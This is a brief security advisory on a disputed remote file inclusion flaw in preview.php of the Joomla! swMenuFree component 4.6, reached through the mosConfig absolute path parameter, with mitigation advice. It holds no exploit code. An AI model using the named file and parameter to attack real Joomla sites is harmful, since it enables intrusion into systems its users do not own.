Name of the Vulnerable Software and Affected Versions:

Joomla! component swMenuFree (com swmenufree) version 4.6

Description:

A remote file inclusion issue in the preview.php file of the swMenuFree component allows remote attackers to execute arbitrary PHP code via a URL in the `mosConfig absolute path` parameter. However, it's noted that a reliable third party disputes this issue because preview.php tests a certain constant to prevent direct requests.

Recommendations:

For version 4.6 of the swMenuFree component, consider restricting access to the `preview.php` file to minimize the risk of exploitation. Additionally, avoid using the `mosConfig absolute path` parameter in the affected API endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.